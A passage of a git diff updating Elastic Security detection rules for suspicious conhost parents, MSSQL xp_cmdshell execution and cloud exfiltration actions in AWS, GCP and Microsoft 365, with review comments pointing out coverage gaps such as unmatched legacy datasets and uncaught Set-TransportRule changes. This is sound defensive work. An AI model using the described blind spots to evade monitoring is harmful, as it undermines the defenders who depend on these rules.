activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity 
is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Conhost Spawned By Suspicious Parent Process\n\nThe Windows Console Host, or `conhost.exe`, is both the server application for all of the Windows Console APIs as well as\nthe classic Windows user interface for working with command-line applications.\n\nAttackers often rely on custom shell implementations to avoid using built-in command interpreters like `cmd.exe` and\n`PowerShell.exe` and bypass application allowlisting and security features. Attackers commonly inject these implementations into\nlegitimate system processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Retrieve the parent process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- Suspicious Process from Conhost - 28896382-7d4f-4d50-9b72-67091901fd26\n- Suspicious PowerShell Engine ImageLoad - 852c1f19-68e8-43a6-9dce-340771fe1be3\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"conhost.exe\" and\n process.parent.name : (\"svchost.exe\", \"lsass.exe\", \"services.exe\", \"smss.exe\", \"winlogon.exe\", \"explorer.exe\",\n \"dllhost.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"userinit.exe\", \"wininit.exe\", \"spoolsv.exe\",\n \"wermgr.exe\", \"csrss.exe\", \"ctfmon.exe\")\n", "references": [ "https://www.fireeye.com/blog/threat-research/2017/08/monitoring-windows-console-activity-part-one.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "05b358de-aa6d-4f6c-89e6-78f74018b43b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -46,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json
index 1b2b37bf23469..8d35a95a9cb98 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/execution_via_xp_cmdshell_mssql_stored_procedure.json
@@ -12,10 +12,28 @@
 "language": "eql",
 "license": "Elastic License v2",
 "name": "Execution via MSSQL xp_cmdshell Stored Procedure",
- "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n",
+ "note": "",
 "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"cmd.exe\" and process.parent.name : \"sqlservr.exe\"\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 73,
 "rule_id": "4ed493fc-d637-4a36-80ff-ac84937e5461",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -43,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json index 65a0ac959cab8..e27ca82583d3c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_full_network_packet_capture_detected.json 
@@ -16,14 +16,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Full Network Packet Capture Detected", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and \nevent.action:(CreateTrafficMirrorFilter or CreateTrafficMirrorFilterRule or CreateTrafficMirrorSession or CreateTrafficMirrorTarget) and \nevent.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and\nevent.action:(CreateTrafficMirrorFilter or CreateTrafficMirrorFilterRule or CreateTrafficMirrorSession or CreateTrafficMirrorTarget) and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_TrafficMirrorFilter.html", "https://github.com/easttimor/aws-incident-response" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c1812764-0788-470f-8e74-eb4a14d47573", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -67,5 +97,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json index f4d0877ca70b7..06559451114de 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_snapshot_change_activity.json 
@@ -15,14 +15,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 Snapshot Activity", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS EC2 Snapshot Activity\n\nAmazon EC2 snapshots are a mechanism to create point-in-time references to data that reside in storage volumes. System\nadministrators commonly use this for backup operations and data recovery.\n\nThis rule looks for the modification of snapshot attributes using the API `ModifySnapshotAttribute` action. This can be\nused to share snapshots with unauthorized third parties, giving others access to all the data on the snapshot.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Search for dry run attempts against the resource ID of the snapshot from other user accounts within CloudTrail.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences involving other users.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Considering the source IP address and geolocation of the user who issued the command:\n - Do they look normal for the calling user?\n - If the source is an EC2 IP address, is it associated with an EC2 instance in one of your accounts or is the source\n IP from an EC2 instance that's not under your control?\n - If it is an authorized EC2 instance, is the activity associated with normal behavior for the instance role or roles?\n Are there any other alerts or signs of suspicious activity involving this instance?\n- Check if this operation was approved and performed according to the organization's change management policy.\n- Check if the shared permissions of the snapshot 
were modified to `Public` or include unknown account IDs.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a\ncombination of user and IP address conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. 
Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Check if unauthorized new users were created, remove unauthorized new accounts, and request password resets for other IAM users.\n- Consider enabling multi-factor authentication for users.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Take the actions needed to return affected systems, data, or services to their normal operational levels.\n- Identify the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:ModifySnapshotAttribute\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/modify-snapshot-attribute.html", "https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_ModifySnapshotAttribute.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "98fd7407-0bd5-5817-cda0-3fcc33113a56", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -30,7 +55,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Exfiltration" ], "threat": [ { 
@@ -51,5 +77,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json index 787cac39c30e4..5ac16e006dc9c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_ec2_vm_export_failure.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS EC2 VM Export Failure", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:CreateInstanceExportTask and event.outcome:failure\n", "references": [ "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e919611d-6b6f-493b-8314-7ed6ac2e413b", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -66,5 +96,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json
index ac016370fe1c0..cb65691251ab7 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_gcp_logging_sink_modification.json
@@ -13,13 +13,37 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "GCP Logging Sink Modification",
- "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:google.logging.v*.ConfigServiceV*.UpdateSink and event.outcome:success\n",
+ "note": "",
+ "query": "event.dataset:gcp.audit and event.action:google.logging.v*.ConfigServiceV*.UpdateSink and event.outcome:success\n",
 "references": [
 "https://cloud.google.com/logging/docs/export#how_sinks_work"
 ],
+ "related_integrations": [
+ {
+ "package": "gcp",
+ "version": "1.10.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.outcome",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "184dfe52-2999-42d9-b9d1-d1ca54495a61",
+ "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -48,5 +72,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 5
+ "version": 7
 }
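Review bot: The new query on this hunk narrows `event.dataset:(googlecloud.audit or gcp.audit)` to `event.dataset:gcp.audit`, so any deployment still indexing under the legacy `googlecloud.audit` name stops matching, while the new `setup` text still states that the Filebeat module or similarly structured data is supported. A logging-sink change is precisely what an attacker makes to cut off audit export, so a silent loss of coverage here is worse than on most rules. Either keep the disjunction in the query, or state the break in `setup`: `This rule matches only the gcp.audit dataset; data shipped under the legacy googlecloud.audit dataset name is not covered.`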
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json index 146a742b419d0..27ace0dcce5ce 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_creation.json 
@@ -14,14 +14,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Transport Rule Creation", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +84,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json index b0e311200ce2e..b416ece26692a 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_microsoft_365_exchange_transport_rule_mod.json @@ -14,15 +14,49 @@ "language": "kuery", "license": "Elastic License v2", "name": "Microsoft 365 Exchange Transport Rule Modification", - "note": "## Config\n\nThe Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:(\"Remove-TransportRule\" or \"Disable-TransportRule\") and event.outcome:success\n", "references": [ "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-transportrule?view=exchange-ps", "https://docs.microsoft.com/en-us/powershell/module/exchange/disable-transportrule?view=exchange-ps", "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" ], + "related_integrations": [ + { + "package": "o365", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "272a6484-2663-46db-a532-ef734bf9a796", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } 
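Review bot: The query in this hunk matches only `Remove-TransportRule` and `Disable-TransportRule`, but the rule is named `Microsoft 365 Exchange Transport Rule Modification` and tagged as exfiltration; the cmdlet that actually alters an existing mail-flow rule, `Set-TransportRule`, is absent, so an attacker adding a BCC or redirect action to an existing rule is matched by neither this rule nor the creation rule above (which matches `New-TransportRule` only). If the Exchange audit feed logs it under the same `event.action` convention as the other cmdlets (I cannot confirm that from the hunk), the fix is one line: `event.action:("Remove-TransportRule" or "Disable-TransportRule" or "Set-TransportRule")`. Otherwise the description should say the rule covers removal and disablement only.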
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json index 0048aae78e28f..bb0f5bcaf6a1a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_export.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Snapshot Export", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:StartExportTask and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StartExportTask.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "119c8877-8613-416d-a98a-96b6664ee73a", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -30,7 +60,8 @@ "AWS", "Continuous Monitoring", "SecOps", - "Asset Visibility" + "Asset Visibility", + "Exfiltration" ], "threat": [ { @@ -45,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json
index 36f53d2b60072..2b1a641bb7b65 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/exfiltration_rds_snapshot_restored.json
@@ -2,7 +2,7 @@
 "author": [
 "Austin Songer"
 ],
- "description": "Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account.",
+ "description": "Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data or evade detection after performing malicious activities. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account.",
 "false_positives": [
 "Restoring snapshots may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Snapshot restoration by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule."
 ],
@@ -13,14 +13,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Snapshot Restored", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:RestoreDBInstanceFromDBSnapshot and\nevent.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_RestoreDBInstanceFromDBSnapshot.html", "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/rds__explore_snapshots/main.py" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bf1073bf-ce26-4607-b405-ba1ed8e9e204", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", 
@@ -28,20 +58,34 @@
 "AWS",
 "Continuous Monitoring",
 "SecOps",
- "Asset Visibility"
+ "Asset Visibility",
+ "Defense Evasion"
 ],
 "threat": [
 {
 "framework": "MITRE ATT&CK",
 "tactic": {
- "id": "TA0010",
- "name": "Exfiltration",
- "reference": "https://attack.mitre.org/tactics/TA0010/"
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
 },
- "technique": []
+ "technique": [
+ {
+ "id": "T1578",
+ "name": "Modify Cloud Compute Infrastructure",
+ "reference": "https://attack.mitre.org/techniques/T1578/",
+ "subtechnique": [
+ {
+ "id": "T1578.004",
+ "name": "Revert Cloud Instance",
+ "reference": "https://attack.mitre.org/techniques/T1578/004/"
+ }
+ ]
+ }
+ ]
 }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json
index a0b8d27b8bf3d..fc81a2057f80b 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/external_alerts.json
@@ -17,6 +17,18 @@
 "max_signals": 10000,
 "name": "External Alerts",
 "query": "event.kind:alert and not event.module:(endgame or endpoint)\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.kind",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.module",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "risk_score_mapping": [
 {
@@ -64,5 +76,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 5
 }
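Review bot: The threat mapping in this hunk swaps TA0010 Exfiltration for TA0005 Defense Evasion / T1578.004 rather than adding to it, yet the same file's description (earlier hunk) still opens with snapshots being shared `in order to exfiltrate bulk data`, the file keeps its `exfiltration_` prefix, and the tags now list `Defense Evasion` with no exfiltration counterpart. `threat` is an array, so both tactics can be carried: keep the existing `TA0010` entry and append the new `TA0005` object beside it, which preserves the rule's ATT&CK coverage and matches what the description says. If dropping Exfiltration is deliberate, the description should stop leading with it so analysts and coverage reports are not told two different stories.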
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_admin_role_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_admin_role_deletion.json deleted file mode 100644 index 26170532f903e..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/google_workspace_admin_role_deletion.json +++ /dev/null 
